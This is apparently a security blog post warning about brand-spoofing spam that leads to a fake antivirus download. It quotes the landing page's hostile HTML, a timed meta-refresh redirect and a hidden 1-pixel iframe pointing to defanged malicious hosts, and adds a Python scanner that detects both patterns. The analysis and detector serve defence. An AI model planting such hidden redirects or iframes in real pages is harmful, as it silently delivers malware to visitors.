MX Lab intercepted emails that lead to rogue antivirus software with the executable antivirus_24.exe. The senders make use of well-known brand names like Macy’s and Costco Photo Center, and perhaps other brands as well.
The URLs inside the message lead to a web site that hosts a malicious script and later offers antivirus_24.exe for download.
When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.
The web site has the following HTML code:
PLEASE WAITING 4 SECOND...
<meta http-equiv="refresh" content="4; url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head>
<body>
<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>
</body>
</html>
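A defender-side check for the two elements in the page source above, as an added example that is not MX Lab's code: it parses HTML and reports timed meta-refresh redirects and iframes hidden via CSS or 1-pixel dimensions. The names scan, LandingPageScanner and is_tiny and the 1-pixel threshold are assumptions, and the sample input is constructed from the quoted source with the URLs left defanged.

```python
import re
from html.parser import HTMLParser

# Constructed sample, copied from the page source quoted above (URLs stay defanged).
SAMPLE = (
    'PLEASE WAITING 4 SECOND... '
    '<meta http-equiv="refresh" content="4; url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">'
    '</head><body> <iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10" '
    'style="visibility: hidden;" height="1" width="1"></iframe> </body></html>'
)

HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
REFRESH = re.compile(r"^\s*(\d+)\s*;\s*url\s*=\s*(.+?)\s*$", re.I)

def is_tiny(value):
    """True when a width/height attribute is 0 or 1 (assumed threshold)."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class LandingPageScanner(HTMLParser):
    """Collects timed meta-refresh redirects and hidden or tiny iframes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values may be None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH.match(a.get("content", ""))
            if m:  # only refreshes that navigate to another URL
                target = m.group(2).strip("'\"")
                self.findings.append(("meta-refresh", int(m.group(1)), target))
        elif tag == "iframe":
            reasons = []
            if HIDDEN_CSS.search(a.get("style", "")):
                reasons.append("css-hidden")
            if is_tiny(a.get("width")) or is_tiny(a.get("height")):
                reasons.append("tiny")
            if reasons:
                self.findings.append(("hidden-iframe", "+".join(reasons), a.get("src", "")))

def scan(html):
    """Return findings for one HTML document, in document order."""
    parser = LandingPageScanner()
    parser.feed(html)
    parser.close()
    return parser.findings
```

A page that combines both findings, as this one does, is worth more attention than either alone, since visible iframes and plain refreshes are common on legitimate sites.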
We got the screen below, but I’m sure that on Windows it will look slightly different: some Windows icons of your hard drives and so on will be included.
You will see some errors claiming that your system is infected, and the instructions lead you to download the malware. This part is obviously fake, so please do not continue the process.
VirusTotal permalink and MD5: 5be4b708a68687cb5490fe2caea49c82